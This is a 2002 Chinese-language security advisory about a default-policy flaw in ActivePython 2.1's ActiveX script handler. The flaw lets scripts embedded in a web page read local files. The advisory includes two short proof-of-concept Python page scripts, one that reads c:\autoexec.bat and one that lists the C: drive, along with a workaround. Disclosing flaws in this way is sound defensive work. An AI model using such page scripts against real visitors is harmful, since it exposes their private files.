ActivePython ActiveX控件默认安全策略漏洞发布时间:2002-01-19 更新时间:2002-01-19 严重程度:中 威胁程度:远程非授权文件存取 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:3893 受影响系统 Activestate ActivePython 2.1详细描述 ActiveState's ActivePython 是python脚本语言在WINDOWS操作系统上的实现。 ActivePython也使用与linux和solaris.WINDOWS下默认的ActivePython包含一个 ActiveX控件注册为语言的脚本处理器,这个处理器允许用户在web页面上嵌入 客户端Python脚本。 这个ActiveX控件不修改关联RExec类的默认策略关联,结果包含在WEB页面上恶 意脚本可以访问文件和目录内容。 测试代码 下面的Python代码可打开c:autoexec.bat: <SCRIPT language=python> import __builtin__ myfile = __builtin__.open("c:\\autoexec.bat") document.write(str(myfile.readlines())) myfile.close() </SCRIPT> 下面的Phthon代码可列出目录: <SCRIPT language=python> import os for file in os.listdir("c:\\"): document.writeln(file, "<br>"); </SCRIPT> 下面是演示是否存在漏洞的页面: http://www.computerbytesman.com/privacy/pythondirdemo.htm 解决方案 临时方法: 当Python代码被用于WEB页时Python实时运行库必须阻塞所有文件操作。 相关信息 Richard M. Smith <rms@computerbytesman.com> 参考:http://www.securityfocus.com/archive/1/250580 相关主页:http://www.activestate.com/Products/ActivePython/ http://aspn.activestate.com/ASPN/Downloads/ActivePython/Extensions/Win32all |
